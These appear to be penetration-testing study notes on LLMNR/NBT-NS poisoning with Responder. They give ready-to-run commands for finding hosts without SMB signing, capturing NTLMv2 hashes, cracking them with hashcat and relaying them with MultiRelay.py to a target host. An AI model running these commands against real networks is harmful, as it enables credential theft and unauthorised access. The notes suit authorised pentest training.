Open-Source Python-based LLMNR/NBT-NS/mDNS Poisoner. In internal Pentesting run this tool 1st even before running Nessus, Nmap or any type of scanning software.
To check which systems do not use SMB signing.
python RunFinger.py -i 192.168.1.0/24
<aside> 💡 Always run the RunFinger on entire subnet rather than single target. "
</aside>
What is SMB signing?
SMB signing (also known as security signatures) is a security mechanism in the SMB protocol. SMB signing means that every SMB 3.1. 1 message contains a signature that is generated by using the session key and the Advanced Encryption Standard (AES) algorithm.
python Responder.py -I eth0 -rdwv
<aside> 💡 When someone's mistakenly types a wrong website or IP. The server doesn't know where this packet is going so, it will be broadcasted into the local network and our machine is gonna tell that it knows where this IP address belongs to and it's gonna capture the hash.
</aside>
When it does we will have this:
*fcastle::MARVEL:jdfj832jdkljr83447j:jfdjf48udk:...*and so on.
user : domain : hash
hashcat -m 5600 hashes.txt rockyou.txt
We can pass this hash to another system saying these are the credentials please authenticate me. So, if this particular hash had access to the target system, the target system will give access to us.
python [MultiRelay.py](<http://multirelay.py/>) -t 192.168.1.210 -u ALL